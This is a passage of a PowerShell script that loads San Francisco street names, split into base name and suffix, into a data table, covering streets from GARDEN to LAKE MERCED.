ST","","GARDEN","ST") + $null = $Streets.Rows.Add("GARDEN WAY","","GARDEN","WAY") + $null = $Streets.Rows.Add("GARDENER RD","","GARDENER","RD") + $null = $Streets.Rows.Add("GARDENSIDE DR","","GARDENSIDE","DR") + $null = $Streets.Rows.Add("GARFIELD ST","","GARFIELD","ST") + $null = $Streets.Rows.Add("GARLINGTON CT","","GARLINGTON","CT") + $null = $Streets.Rows.Add("GARNETT TER","","GARNETT","TER") + $null = $Streets.Rows.Add("GARRISON AVE","","GARRISON","AVE") + $null = $Streets.Rows.Add("GATES ST","","GATES","ST") + $null = $Streets.Rows.Add("GATEVIEW AVE","","GATEVIEW","AVE") + $null = $Streets.Rows.Add("GATEVIEW CT","","GATEVIEW","CT") + $null = $Streets.Rows.Add("GATEVIEW 1 CT","","GATEVIEW 1","CT") + $null = $Streets.Rows.Add("GATEVIEW 2 CT","","GATEVIEW 2","CT") + $null = $Streets.Rows.Add("GATEVIEW 3 CT","","GATEVIEW 3","CT") + $null = $Streets.Rows.Add("GATUN ALY","","GATUN","ALY") + $null = $Streets.Rows.Add("GAVEN ST","","GAVEN","ST") + $null = $Streets.Rows.Add("GAVIOTA WAY","","GAVIOTA","WAY") + $null = $Streets.Rows.Add("GEARY BLVD","","GEARY","BLVD") + $null = $Streets.Rows.Add("GEARY ST","","GEARY","ST") + $null = $Streets.Rows.Add("GELLERT DR","","GELLERT","DR") + $null = $Streets.Rows.Add("COHEN PL","","COHEN","PL") + $null = $Streets.Rows.Add("GENEBERN WAY","","GENEBERN","WAY") + $null = $Streets.Rows.Add("GENERAL KENNEDY AVE","","GENERAL KENNEDY","AVE") + $null = $Streets.Rows.Add("GENEVA AVE","","GENEVA","AVE") + $null = $Streets.Rows.Add("GENNESSEE ST","","GENNESSEE","ST") + $null = $Streets.Rows.Add("GENOA PL","","GENOA","PL") + $null = $Streets.Rows.Add("GEORGE CT","","GEORGE","CT") + $null = $Streets.Rows.Add("GEORGIA ST","","GEORGIA","ST") + $null = $Streets.Rows.Add("GERKE ALY","","GERKE","ALY") + $null = $Streets.Rows.Add("GERMANIA ST","","GERMANIA","ST") + $null = $Streets.Rows.Add("GETZ ST","","GETZ","ST") + $null = $Streets.Rows.Add("GGP ACCESS ROAD","","GGP ACCESS ROAD","") + $null = $Streets.Rows.Add("GIANTS DR","","GIANTS","DR") + $null = $Streets.Rows.Add("GIBB ST","","GIBB","ST") + $null = $Streets.Rows.Add("GIBBON CT","","GIBBON","CT") + $null = $Streets.Rows.Add("GIBBON LN","","GIBBON","LN") + $null = $Streets.Rows.Add("GIBSON RD","","GIBSON","RD") + $null = $Streets.Rows.Add("GILBERT ST","","GILBERT","ST") + $null = $Streets.Rows.Add("GILLETTE AVE","","GILLETTE","AVE") + $null = $Streets.Rows.Add("GILMAN AVE","","GILMAN","AVE") + $null = $Streets.Rows.Add("GILROY ST","","GILROY","ST") + $null = $Streets.Rows.Add("GIRARD RD","","GIRARD","RD") + $null = $Streets.Rows.Add("GIRARD ST","","GIRARD","ST") + $null = $Streets.Rows.Add("GLADEVIEW WAY","","GLADEVIEW","WAY") + $null = $Streets.Rows.Add("GLADIOLUS LN","","GLADIOLUS","LN") + $null = $Streets.Rows.Add("GLADSTONE DR","","GLADSTONE","DR") + $null = $Streets.Rows.Add("GLADYS ST","","GLADYS","ST") + $null = $Streets.Rows.Add("GLEN CT","","GLEN","CT") + $null = $Streets.Rows.Add("GLENBROOK AVE","","GLENBROOK","AVE") + $null = $Streets.Rows.Add("GLENDALE ST","","GLENDALE","ST") + $null = $Streets.Rows.Add("GLENHAVEN LN","","GLENHAVEN","LN") + $null = $Streets.Rows.Add("GLENVIEW DR","","GLENVIEW","DR") + $null = $Streets.Rows.Add("GLOBE ALY","","GLOBE","ALY") + $null = $Streets.Rows.Add("GLORIA CT","","GLORIA","CT") + $null = $Streets.Rows.Add("GLOVER ST","","GLOVER","ST") + $null = $Streets.Rows.Add("GODEUS ST","","GODEUS","ST") + $null = $Streets.Rows.Add("GOETHE ST","","GOETHE","ST") + $null = $Streets.Rows.Add("GOETTINGEN ST","","GOETTINGEN","ST") + $null = $Streets.Rows.Add("GOLD ST","","GOLD","ST") + $null = $Streets.Rows.Add("GOLD MINE DR","","GOLD MINE","DR") + $null = $Streets.Rows.Add("GOLDBERG LN","","GOLDBERG","LN") + $null = $Streets.Rows.Add("GOLDEN CT","","GOLDEN","CT") + $null = $Streets.Rows.Add("GOLDEN GATE AVE","","GOLDEN GATE","AVE") + $null = $Streets.Rows.Add("GOLDING LN","","GOLDING","LN") + $null = $Streets.Rows.Add("GOLETA AVE","","GOLETA","AVE") + $null = $Streets.Rows.Add("GOLF COURSE ACCESS RD","","GOLF COURSE ACCESS","RD") + $null = $Streets.Rows.Add("GONZALEZ DR","","GONZALEZ","DR") + $null = $Streets.Rows.Add("GORDON ST","","GORDON","ST") + $null = $Streets.Rows.Add("GORGAS AVE","","GORGAS","AVE") + $null = $Streets.Rows.Add("GORHAM ST","","GORHAM","ST") + $null = $Streets.Rows.Add("GOUGH ST","","GOUGH","ST") + $null = $Streets.Rows.Add("GOULD ST","","GOULD","ST") + $null = $Streets.Rows.Add("GRACE ST","","GRACE","ST") + $null = $Streets.Rows.Add("GRAFTON AVE","","GRAFTON","AVE") + $null = $Streets.Rows.Add("GRAHAM ST","","GRAHAM","ST") + $null = $Streets.Rows.Add("GRANADA AVE","","GRANADA","AVE") + $null = $Streets.Rows.Add("GRAND VIEW AVE","","GRAND VIEW","AVE") + $null = $Streets.Rows.Add("GRAND VIEW TER","","GRAND VIEW","TER") + $null = $Streets.Rows.Add("GRANT AVE","","GRANT","AVE") + $null = $Streets.Rows.Add("GRANVILLE WAY","","GRANVILLE","WAY") + $null = $Streets.Rows.Add("GRATTAN ST","","GRATTAN","ST") + $null = $Streets.Rows.Add("GRAYSTONE TER","","GRAYSTONE","TER") + $null = $Streets.Rows.Add("GREAT HWY","","GREAT","HWY") + $null = $Streets.Rows.Add("GREELY CT","","GREELY","CT") + $null = $Streets.Rows.Add("GREEN ST","","GREEN","ST") + $null = $Streets.Rows.Add("GREENOUGH AVE","","GREENOUGH","AVE") + $null = $Streets.Rows.Add("GREENVIEW CT","","GREENVIEW","CT") + $null = $Streets.Rows.Add("GREENWICH CT","","GREENWICH","CT") + $null = $Streets.Rows.Add("GREENWICH ST","","GREENWICH","ST") + $null = $Streets.Rows.Add("GREENWOOD AVE","","GREENWOOD","AVE") + $null = $Streets.Rows.Add("GRENARD TER","","GRENARD","TER") + $null = $Streets.Rows.Add("GRIFFITH ST","","GRIFFITH","ST") + $null = $Streets.Rows.Add("GRIJALVA DR","","GRIJALVA","DR") + $null = $Streets.Rows.Add("GROTE PL","","GROTE","PL") + $null = $Streets.Rows.Add("GROVE ST","","GROVE","ST") + $null = $Streets.Rows.Add("GUERRERO ST","","GUERRERO","ST") + $null = $Streets.Rows.Add("GUTTENBERG ST","","GUTTENBERG","ST") + $null = $Streets.Rows.Add("GUY PL","","GUY","PL") + $null = $Streets.Rows.Add("H ST","","H","ST") + $null = $Streets.Rows.Add("HABITAT TER","","HABITAT","TER") + $null = $Streets.Rows.Add("HAGIWARA TEA GARDEN DR","","HAGIWARA TEA GARDEN","DR") + $null = $Streets.Rows.Add("HAHN ST","","HAHN","ST") + $null = $Streets.Rows.Add("HAIGHT ST","","HAIGHT","ST") + $null = $Streets.Rows.Add("HALE ST","","HALE","ST") + $null = $Streets.Rows.Add("HALIBUT CT","","HALIBUT","CT") + $null = $Streets.Rows.Add("HALLAM ST","","HALLAM","ST") + $null = $Streets.Rows.Add("HALLECK ST","","HALLECK","ST") + $null = $Streets.Rows.Add("HALYBURTON CT","","HALYBURTON","CT") + $null = $Streets.Rows.Add("HAMERTON AVE","","HAMERTON","AVE") + $null = $Streets.Rows.Add("HAMILTON ST","","HAMILTON","ST") + $null = $Streets.Rows.Add("HAMLIN ST","","HAMLIN","ST") + $null = $Streets.Rows.Add("HAMPSHIRE ST","","HAMPSHIRE","ST") + $null = $Streets.Rows.Add("HANCOCK ST","","HANCOCK","ST") + $null = $Streets.Rows.Add("HANGAH ST","","HANGAH","ST") + $null = $Streets.Rows.Add("HANOVER ST","","HANOVER","ST") + $null = $Streets.Rows.Add("HARBOR RD","","HARBOR","RD") + $null = $Streets.Rows.Add("HARDIE AVE","","HARDIE","AVE") + $null = $Streets.Rows.Add("HARDIE PL","","HARDIE","PL") + $null = $Streets.Rows.Add("HARDING RD","","HARDING","RD") + $null = $Streets.Rows.Add("HARE ST","","HARE","ST") + $null = $Streets.Rows.Add("HARKNESS AVE","","HARKNESS","AVE") + $null = $Streets.Rows.Add("HARLAN PL","","HARLAN","PL") + $null = $Streets.Rows.Add("HARLEM ALY","","HARLEM","ALY") + $null = $Streets.Rows.Add("HARLOW ST","","HARLOW","ST") + $null = $Streets.Rows.Add("HARNEY WAY","","HARNEY","WAY") + $null = $Streets.Rows.Add("HAROLD AVE","","HAROLD","AVE") + $null = $Streets.Rows.Add("HARPER ST","","HARPER","ST") + $null = $Streets.Rows.Add("HARRIET LN","","HARRIET","LN") + $null = $Streets.Rows.Add("HARRIET ST","","HARRIET","ST") + $null = $Streets.Rows.Add("HARRINGTON ST","","HARRINGTON","ST") + $null = $Streets.Rows.Add("HARRIS PL","","HARRIS","PL") + $null = $Streets.Rows.Add("HARRISON BLVD","","HARRISON","BLVD") + $null = $Streets.Rows.Add("HARRISON ST","","HARRISON","ST") + $null = $Streets.Rows.Add("HARRY ST","","HARRY","ST") + $null = $Streets.Rows.Add("HARTFORD ST","","HARTFORD","ST") + $null = $Streets.Rows.Add("HARVARD ST","","HARVARD","ST") + $null = $Streets.Rows.Add("HASTINGS TER","","HASTINGS","TER") + $null = $Streets.Rows.Add("HATTIE ST","","HATTIE","ST") + $null = $Streets.Rows.Add("HAVELOCK ST","","HAVELOCK","ST") + $null = $Streets.Rows.Add("HAVENS ST","","HAVENS","ST") + $null = $Streets.Rows.Add("HAVENSIDE DR","","HAVENSIDE","DR") + $null = $Streets.Rows.Add("HAWES ST","","HAWES","ST") + $null = $Streets.Rows.Add("HAWKINS LN","","HAWKINS","LN") + $null = $Streets.Rows.Add("HAWTHORNE ST","","HAWTHORNE","ST") + $null = $Streets.Rows.Add("HAYES ST","","HAYES","ST") + $null = $Streets.Rows.Add("HAYS ST","","HAYS","ST") + $null = $Streets.Rows.Add("HAYWARD ST","","HAYWARD","ST") + $null = $Streets.Rows.Add("HAZELWOOD AVE","","HAZELWOOD","AVE") + $null = $Streets.Rows.Add("HEAD ST","","HEAD","ST") + $null = $Streets.Rows.Add("HEALY AVE","","HEALY","AVE") + $null = $Streets.Rows.Add("HEARST AVE","","HEARST","AVE") + $null = $Streets.Rows.Add("HEATHER AVE","","HEATHER","AVE") + $null = $Streets.Rows.Add("HELEN ST","","HELEN","ST") + $null = $Streets.Rows.Add("HELENA ST","","HELENA","ST") + $null = $Streets.Rows.Add("HEMLOCK ST","","HEMLOCK","ST") + $null = $Streets.Rows.Add("HEMWAY TER","","HEMWAY","TER") + $null = $Streets.Rows.Add("HENRY ST","","HENRY","ST") + $null = $Streets.Rows.Add("HENRY ADAMS ST","","HENRY ADAMS","ST") + $null = $Streets.Rows.Add("HERITAGE LN","","HERITAGE","LN") + $null = $Streets.Rows.Add("HERMANN ST","","HERMANN","ST") + $null = $Streets.Rows.Add("HERNANDEZ AVE","","HERNANDEZ","AVE") + $null = $Streets.Rows.Add("HERON ST","","HERON","ST") + $null = $Streets.Rows.Add("HESTER AVE","","HESTER","AVE") + $null = $Streets.Rows.Add("HEYMAN AVE","","HEYMAN","AVE") + $null = $Streets.Rows.Add("HICKORY ST","","HICKORY","ST") + $null = $Streets.Rows.Add("HICKS RD","","HICKS","RD") + $null = $Streets.Rows.Add("HIDALGO TER","","HIDALGO","TER") + $null = $Streets.Rows.Add("HIGH ST","","HIGH","ST") + $null = $Streets.Rows.Add("HIGHLAND AVE","","HIGHLAND","AVE") + $null = $Streets.Rows.Add("HIGUERA AVE","","HIGUERA","AVE") + $null = $Streets.Rows.Add("HILIRITAS AVE","","HILIRITAS","AVE") + $null = $Streets.Rows.Add("HILL DR","","HILL","DR") + $null = $Streets.Rows.Add("HILL ST","","HILL","ST") + $null = $Streets.Rows.Add("HILL POINT AVE","","HILL POINT","AVE") + $null = $Streets.Rows.Add("HILLCREST CT","","HILLCREST","CT") + $null = $Streets.Rows.Add("HILLCREST RD","","HILLCREST","RD") + $null = $Streets.Rows.Add("HILLSIDE LN","","HILLSIDE","LN") + $null = $Streets.Rows.Add("HILLVIEW CT","","HILLVIEW","CT") + $null = $Streets.Rows.Add("HILLWAY AVE","","HILLWAY","AVE") + $null = $Streets.Rows.Add("HILTON ST","","HILTON","ST") + $null = $Streets.Rows.Add("HIMMELMANN PL","","HIMMELMANN","PL") + $null = $Streets.Rows.Add("HITCHCOCK LN","","HITCHCOCK","LN") + $null = $Streets.Rows.Add("HITCHCOCK ST","","HITCHCOCK","ST") + $null = $Streets.Rows.Add("HOBART ALY","","HOBART","ALY") + $null = $Streets.Rows.Add("HODGES ALY","","HODGES","ALY") + $null = $Streets.Rows.Add("HOFF ST","","HOFF","ST") + $null = $Streets.Rows.Add("HOFFMAN AVE","","HOFFMAN","AVE") + $null = $Streets.Rows.Add("HOFFMAN ST","","HOFFMAN","ST") + $null = $Streets.Rows.Add("HOLLADAY AVE","","HOLLADAY","AVE") + $null = $Streets.Rows.Add("HOLLIS ST","","HOLLIS","ST") + $null = $Streets.Rows.Add("HOLLISTER AVE","","HOLLISTER","AVE") + $null = $Streets.Rows.Add("HOLLOWAY AVE","","HOLLOWAY","AVE") + $null = $Streets.Rows.Add("HOLLY PARK CIR","","HOLLY PARK","CIR") + $null = $Streets.Rows.Add("HOLLYWOOD CT","","HOLLYWOOD","CT") + $null = $Streets.Rows.Add("HOLYOKE ST","","HOLYOKE","ST") + $null = $Streets.Rows.Add("HOMER ST","","HOMER","ST") + $null = $Streets.Rows.Add("HOMESTEAD ST","","HOMESTEAD","ST") + $null = $Streets.Rows.Add("HOMEWOOD CT","","HOMEWOOD","CT") + $null = $Streets.Rows.Add("HOOKER ALY","","HOOKER","ALY") + $null = $Streets.Rows.Add("HOOPER ST","","HOOPER","ST") + $null = $Streets.Rows.Add("HOPKINS AVE","","HOPKINS","AVE") + $null = $Streets.Rows.Add("HORACE ST","","HORACE","ST") + $null = $Streets.Rows.Add("HORNE AVE","","HORNE","AVE") + $null = $Streets.Rows.Add("HOTALING PL","","HOTALING","PL") + $null = $Streets.Rows.Add("HOUSTON ST","","HOUSTON","ST") + $null = $Streets.Rows.Add("HOWARD CT","","HOWARD","CT") + $null = $Streets.Rows.Add("HOWARD RD","","HOWARD","RD") + $null = $Streets.Rows.Add("HOWARD ST","","HOWARD","ST") + $null = $Streets.Rows.Add("HOWTH ST","","HOWTH","ST") + $null = $Streets.Rows.Add("HUBBELL ST","","HUBBELL","ST") + $null = $Streets.Rows.Add("HUDSON AVE","","HUDSON","AVE") + $null = $Streets.Rows.Add("HUGO ST","","HUGO","ST") + $null = $Streets.Rows.Add("HULBERT ALY","","HULBERT","ALY") + $null = $Streets.Rows.Add("HUMBOLDT ST","","HUMBOLDT","ST") + $null = $Streets.Rows.Add("HUNT ST","","HUNT","ST") + $null = $Streets.Rows.Add("HUNTER RD","","HUNTER","RD") + $null = $Streets.Rows.Add("HUNTER ST","","HUNTER","ST") + $null = $Streets.Rows.Add("HUNTERS POINT BLVD","","HUNTERS POINT","BLVD") + $null = $Streets.Rows.Add("HUNTERS POINT EXPY","","HUNTERS POINT","EXPY") + $null = $Streets.Rows.Add("HUNTINGTON DR","","HUNTINGTON","DR") + $null = $Streets.Rows.Add("HURON AVE","","HURON","AVE") + $null = $Streets.Rows.Add("HUSSEY ST","","HUSSEY","ST") + $null = $Streets.Rows.Add("HUTCHINS CT","","HUTCHINS","CT") + $null = $Streets.Rows.Add("HWY 1 NORTHBOUND","","HWY 1 NORTHBOUND","") + $null = $Streets.Rows.Add("HWY 1 SOUTHBOUND","","HWY 1 SOUTHBOUND","") + $null = $Streets.Rows.Add("HWY 1 TO HWY 101 NORTHBOUND RAMP","","HWY 1 TO HWY 101 NORTHBOUND","RAMP") + $null = $Streets.Rows.Add("HWY 1 TO HWY 101 SOUTHBOUND RAMP","","HWY 1 TO HWY 101 SOUTHBOUND","RAMP") + $null = $Streets.Rows.Add("HWY 101 N OFF RAMP","","HWY 101 N OFF","RAMP") + $null = $Streets.Rows.Add("HWY 101 N ON RAMP","","HWY 101 N ON","RAMP") + $null = $Streets.Rows.Add("HWY 101 NORTHBOUND","","HWY 101 NORTHBOUND","") + $null = $Streets.Rows.Add("HWY 101 NORTHBOUND RAMP","","HWY 101 NORTHBOUND","RAMP") + $null = $Streets.Rows.Add("HWY 101 S OFF RAMP","","HWY 101 S OFF","RAMP") + $null = $Streets.Rows.Add("HWY 101 S ON RAMP","","HWY 101 S ON","RAMP") + $null = $Streets.Rows.Add("HWY 101 SOUTHBOUND","","HWY 101 SOUTHBOUND","") + $null = $Streets.Rows.Add("HWY 101 SOUTHBOUND RAMP","","HWY 101 SOUTHBOUND","RAMP") + $null = $Streets.Rows.Add("HWY 101 TO HWY 1 RAMP","","HWY 101 TO HWY 1","RAMP") + $null = $Streets.Rows.Add("HWY 101 TO I-280 RAMP","","HWY 101 TO I-280","RAMP") + $null = $Streets.Rows.Add("HWY 101 TO I-80 RAMP","","HWY 101 TO I-80","RAMP") + $null = $Streets.Rows.Add("HYDE ST","","HYDE","ST") + $null = $Streets.Rows.Add("I ST","","I","ST") + $null = $Streets.Rows.Add("I-280 N OFF RAMP","","I-280 N OFF","RAMP") + $null = $Streets.Rows.Add("I-280 N ON RAMP","","I-280 N ON","RAMP") + $null = $Streets.Rows.Add("I-280 NORTHBOUND","","I-280 NORTHBOUND","") + $null = $Streets.Rows.Add("I-280 S OFF RAMP","","I-280 S OFF","RAMP") + $null = $Streets.Rows.Add("I-280 S ON RAMP","","I-280 S ON","RAMP") + $null = $Streets.Rows.Add("I-280 SOUTHBOUND","","I-280 SOUTHBOUND","") + $null = $Streets.Rows.Add("JUANITA WAY","","JUANITA","WAY") + $null = $Streets.Rows.Add("I-280 TO HWY 101 RAMP","","I-280 TO HWY 101","RAMP") + $null = $Streets.Rows.Add("I-80 E OFF RAMP","","I-80 E OFF","RAMP") + $null = $Streets.Rows.Add("I-80 E ON RAMP","","I-80 E ON","RAMP") + $null = $Streets.Rows.Add("I-80 EASTBOUND","","I-80 EASTBOUND","") + $null = $Streets.Rows.Add("I-80 TO HWY 101 RAMP","","I-80 TO HWY 101","RAMP") + $null = $Streets.Rows.Add("I-80 W OFF RAMP","","I-80 W OFF","RAMP") + $null = $Streets.Rows.Add("I-80 W ON RAMP","","I-80 W ON","RAMP") + $null = $Streets.Rows.Add("I-80 WESTBOUND","","I-80 WESTBOUND","") + $null = $Streets.Rows.Add("ICEHOUSE ALY","","ICEHOUSE","ALY") + $null = $Streets.Rows.Add("IDORA AVE","","IDORA","AVE") + $null = $Streets.Rows.Add("IGNACIO AVE","","IGNACIO","AVE") + $null = $Streets.Rows.Add("ILLINOIS ST","","ILLINOIS","ST") + $null = $Streets.Rows.Add("ILS LN","","ILS","LN") + $null = $Streets.Rows.Add("IMPERIAL ALY","","IMPERIAL","ALY") + $null = $Streets.Rows.Add("INA CT","","INA","CT") + $null = $Streets.Rows.Add("INCA LN","","INCA","LN") + $null = $Streets.Rows.Add("INCINERATOR RD","","INCINERATOR","RD") + $null = $Streets.Rows.Add("INDIA ST","","INDIA","ST") + $null = $Streets.Rows.Add("INDIANA ST","","INDIANA","ST") + $null = $Streets.Rows.Add("INDUSTRIAL ST","","INDUSTRIAL","ST") + $null = $Streets.Rows.Add("INDUSTRIAL ST OFF RAMP","","INDUSTRIAL ST OFF","RAMP") + $null = $Streets.Rows.Add("INDUSTRIAL ST ON RAMP","","INDUSTRIAL ST ON","RAMP") + $null = $Streets.Rows.Add("INFANTRY TER","","INFANTRY","TER") + $null = $Streets.Rows.Add("INGALLS ST","","INGALLS","ST") + $null = $Streets.Rows.Add("INGERSON AVE","","INGERSON","AVE") + $null = $Streets.Rows.Add("INGLESIDE PATH","","INGLESIDE","PATH") + $null = $Streets.Rows.Add("INNES AVE","","INNES","AVE") + $null = $Streets.Rows.Add("PHILLIPS LN","","PHILLIPS","LN") + $null = $Streets.Rows.Add("INVERNESS DR","","INVERNESS","DR") + $null = $Streets.Rows.Add("IOWA ST","","IOWA","ST") + $null = $Streets.Rows.Add("IRIS AVE","","IRIS","AVE") + $null = $Streets.Rows.Add("IRON ALY","","IRON","ALY") + $null = $Streets.Rows.Add("BRUTON ST","","BRUTON","ST") + $null = $Streets.Rows.Add("IRVING ST","","IRVING","ST") + $null = $Streets.Rows.Add("IRWIN ST","","IRWIN","ST") + $null = $Streets.Rows.Add("ISADORA DUNCAN LN","","ISADORA DUNCAN","LN") + $null = $Streets.Rows.Add("ISIS ST","","ISIS","ST") + $null = $Streets.Rows.Add("ISLAIS ST","","ISLAIS","ST") + $null = $Streets.Rows.Add("ISOLA WAY","","ISOLA","WAY") + $null = $Streets.Rows.Add("ISSLEIB AVE","","ISSLEIB","AVE") + $null = $Streets.Rows.Add("ITALY AVE","","ITALY","AVE") + $null = $Streets.Rows.Add("IVY ST","","IVY","ST") + $null = $Streets.Rows.Add("J ST","","J","ST") + $null = $Streets.Rows.Add("JACK BALESTRERI WAY","","JACK BALESTRERI","WAY") + $null = $Streets.Rows.Add("JACK KEROUAC ALY","","JACK KEROUAC","ALY") + $null = $Streets.Rows.Add("JACK LONDON ALY","","JACK LONDON","ALY") + $null = $Streets.Rows.Add("JACK MICHELINE ALY","","JACK MICHELINE","ALY") + $null = $Streets.Rows.Add("JACKSON ST","","JACKSON","ST") + $null = $Streets.Rows.Add("JADE PL","","JADE","PL") + $null = $Streets.Rows.Add("JAKEY CT","","JAKEY","CT") + $null = $Streets.Rows.Add("JAMES PL","","JAMES","PL") + $null = $Streets.Rows.Add("JAMESTOWN AVE","","JAMESTOWN","AVE") + $null = $Streets.Rows.Add("JANSEN ST","","JANSEN","ST") + $null = $Streets.Rows.Add("JARBOE AVE","","JARBOE","AVE") + $null = $Streets.Rows.Add("JASON CT","","JASON","CT") + $null = $Streets.Rows.Add("JASPER PL","","JASPER","PL") + $null = $Streets.Rows.Add("JAUSS ST","","JAUSS","ST") + $null = $Streets.Rows.Add("JAVA ST","","JAVA","ST") + $null = $Streets.Rows.Add("JEAN WAY","","JEAN","WAY") + $null = $Streets.Rows.Add("JEFFERSON ST","","JEFFERSON","ST") + $null = $Streets.Rows.Add("JENNIFER PL","","JENNIFER","PL") + $null = $Streets.Rows.Add("JENNINGS CT","","JENNINGS","CT") + $null = $Streets.Rows.Add("JENNINGS ST","","JENNINGS","ST") + $null = $Streets.Rows.Add("JEROME ALY","","JEROME","ALY") + $null = $Streets.Rows.Add("JERROLD AVE","","JERROLD","AVE") + $null = $Streets.Rows.Add("JERSEY ST","","JERSEY","ST") + $null = $Streets.Rows.Add("JESSIE ST","","JESSIE","ST") + $null = $Streets.Rows.Add("JESSIE EAST ST","","JESSIE EAST","ST") + $null = $Streets.Rows.Add("JESSIE WEST ST","","JESSIE WEST","ST") + $null = $Streets.Rows.Add("JEWETT ST","","JEWETT","ST") + $null = $Streets.Rows.Add("JOHN ST","","JOHN","ST") + $null = $Streets.Rows.Add("JOHN F KENNEDY DR","","JOHN F KENNEDY","DR") + $null = $Streets.Rows.Add("JOHN F SHELLEY DR","","JOHN F SHELLEY","DR") + $null = $Streets.Rows.Add("JOHN MAHER ST","","JOHN MAHER","ST") + $null = $Streets.Rows.Add("JOHN MUIR DR","","JOHN MUIR","DR") + $null = $Streets.Rows.Add("JOHNSTONE DR","","JOHNSTONE","DR") + $null = $Streets.Rows.Add("JOICE ST","","JOICE","ST") + $null = $Streets.Rows.Add("JONES ST","","JONES","ST") + $null = $Streets.Rows.Add("JOOST AVE","","JOOST","AVE") + $null = $Streets.Rows.Add("JORDAN AVE","","JORDAN","AVE") + $null = $Streets.Rows.Add("JOSE SARRIA CT","","JOSE SARRIA","CT") + $null = $Streets.Rows.Add("JOSEPHA AVE","","JOSEPHA","AVE") + $null = $Streets.Rows.Add("JOSIAH AVE","","JOSIAH","AVE") + $null = $Streets.Rows.Add("JOY ST","","JOY","ST") + $null = $Streets.Rows.Add("JUAN BAUTISTA CIR","","JUAN BAUTISTA","CIR") + $null = $Streets.Rows.Add("JUDAH ST","","JUDAH","ST") + $null = $Streets.Rows.Add("JUDSON AVE","","JUDSON","AVE") + $null = $Streets.Rows.Add("JULES AVE","","JULES","AVE") + $null = $Streets.Rows.Add("JULIA ST","","JULIA","ST") + $null = $Streets.Rows.Add("JULIAN AVE","","JULIAN","AVE") + $null = $Streets.Rows.Add("JULIUS ST","","JULIUS","ST") + $null = $Streets.Rows.Add("JUNIOR TER","","JUNIOR","TER") + $null = $Streets.Rows.Add("JUNIPER ST","","JUNIPER","ST") + $null = $Streets.Rows.Add("JUNIPERO SERRA BLVD","","JUNIPERO SERRA","BLVD") + $null = $Streets.Rows.Add("JUNIPERO SERRA BLVD OFF RAMP","","JUNIPERO SERRA BLVD OFF","RAMP") + $null = $Streets.Rows.Add("JUNIPERO SERRA BLVD ON RAMP","","JUNIPERO SERRA BLVD ON","RAMP") + $null = $Streets.Rows.Add("JURI ST","","JURI","ST") + $null = $Streets.Rows.Add("JUSTIN DR","","JUSTIN","DR") + $null = $Streets.Rows.Add("KALMANOVITZ ST","","KALMANOVITZ","ST") + $null = $Streets.Rows.Add("KAMILLE CT","","KAMILLE","CT") + $null = $Streets.Rows.Add("KANSAS ST","","KANSAS","ST") + $null = $Streets.Rows.Add("KAPLAN LN","","KAPLAN","LN") + $null = $Streets.Rows.Add("KAREN CT","","KAREN","CT") + $null = $Streets.Rows.Add("KATE ST","","KATE","ST") + $null = $Streets.Rows.Add("KEARNY LN","","KEARNY","LN") + $null = $Streets.Rows.Add("KEARNY ST","","KEARNY","ST") + $null = $Streets.Rows.Add("KEITH ST","","KEITH","ST") + $null = $Streets.Rows.Add("KELLOCH AVE","","KELLOCH","AVE") + $null = $Streets.Rows.Add("KEMPTON AVE","","KEMPTON","AVE") + $null = $Streets.Rows.Add("KENDALL DR","","KENDALL","DR") + $null = $Streets.Rows.Add("MRS. JACKSON WAY","","MRS. JACKSON","WAY") + $null = $Streets.Rows.Add("KENNETH REXROTH PL","","KENNETH REXROTH","PL") + $null = $Streets.Rows.Add("KENNY ALY","","KENNY","ALY") + $null = $Streets.Rows.Add("KENSINGTON WAY","","KENSINGTON","WAY") + $null = $Streets.Rows.Add("KENT ST","","KENT","ST") + $null = $Streets.Rows.Add("KENWOOD WAY","","KENWOOD","WAY") + $null = $Streets.Rows.Add("KEPPLER CT","","KEPPLER","CT") + $null = $Streets.Rows.Add("KERN ST","","KERN","ST") + $null = $Streets.Rows.Add("KEY AVE","","KEY","AVE") + $null = $Streets.Rows.Add("KEYES ALY","","KEYES","ALY") + $null = $Streets.Rows.Add("KEYES AVE","","KEYES","AVE") + $null = $Streets.Rows.Add("KEYSTONE WAY","","KEYSTONE","WAY") + $null = $Streets.Rows.Add("KEZAR DR","","KEZAR","DR") + $null = $Streets.Rows.Add("KIMBALL PL","","KIMBALL","PL") + $null = $Streets.Rows.Add("KING ST","","KING","ST") + $null = $Streets.Rows.Add("KINGSTON ST","","KINGSTON","ST") + $null = $Streets.Rows.Add("KINZEY ST","","KINZEY","ST") + $null = $Streets.Rows.Add("KIRKHAM ST","","KIRKHAM","ST") + $null = $Streets.Rows.Add("KIRKWOOD AVE","","KIRKWOOD","AVE") + $null = $Streets.Rows.Add("KISKA RD","","KISKA","RD") + $null = $Streets.Rows.Add("KISSLING ST","","KISSLING","ST") + $null = $Streets.Rows.Add("KITTREDGE TER","","KITTREDGE","TER") + $null = $Streets.Rows.Add("KNOCKASH HL","","KNOCKASH","HL") + $null = $Streets.Rows.Add("KNOLLVIEW WAY","","KNOLLVIEW","WAY") + $null = $Streets.Rows.Add("KNOTT CT","","KNOTT","CT") + $null = $Streets.Rows.Add("KOBBE AVE","","KOBBE","AVE") + $null = $Streets.Rows.Add("KOHLER PL","","KOHLER","PL") + $null = $Streets.Rows.Add("KORET WAY","","KORET","WAY") + $null = $Streets.Rows.Add("KRAMER PL","","KRAMER","PL") + $null = $Streets.Rows.Add("KRAUSGRILL PL","","KRAUSGRILL","PL") + $null = $Streets.Rows.Add("KRONQUIST CT","","KRONQUIST","CT") + $null = $Streets.Rows.Add("LA AVANZADA","","LA AVANZADA","") + $null = $Streets.Rows.Add("LA BICA WAY","","LA BICA","WAY") + $null = $Streets.Rows.Add("LA FERRERA TER","","LA FERRERA","TER") + $null = $Streets.Rows.Add("LA GRANDE AVE","","LA GRANDE","AVE") + $null = $Streets.Rows.Add("LA PLAYA","","LA PLAYA","") + $null = $Streets.Rows.Add("LA SALLE AVE","","LA SALLE","AVE") + $null = $Streets.Rows.Add("LAFAYETTE ST","","LAFAYETTE","ST") + $null = $Streets.Rows.Add("LAGUNA ST","","LAGUNA","ST") + $null = $Streets.Rows.Add("LAGUNA HONDA BLVD","","LAGUNA HONDA","BLVD") + $null = $Streets.Rows.Add("LAGUNITAS DR","","LAGUNITAS","DR") + $null = $Streets.Rows.Add("LAIDLEY ST","","LAIDLEY","ST") + $null = $Streets.Rows.Add("LAKE ST","","LAKE","ST") + $null = $Streets.Rows.Add("LAKE FOREST CT","","LAKE FOREST","CT") + $null = $Streets.Rows.Add("LAKE MERCED BLVD","","LAKE MERCED","BLVD") + $null = $Streets.Rows.Add("LAKE MERCED HILL","","LAKE MERCED HILL","") + $null = 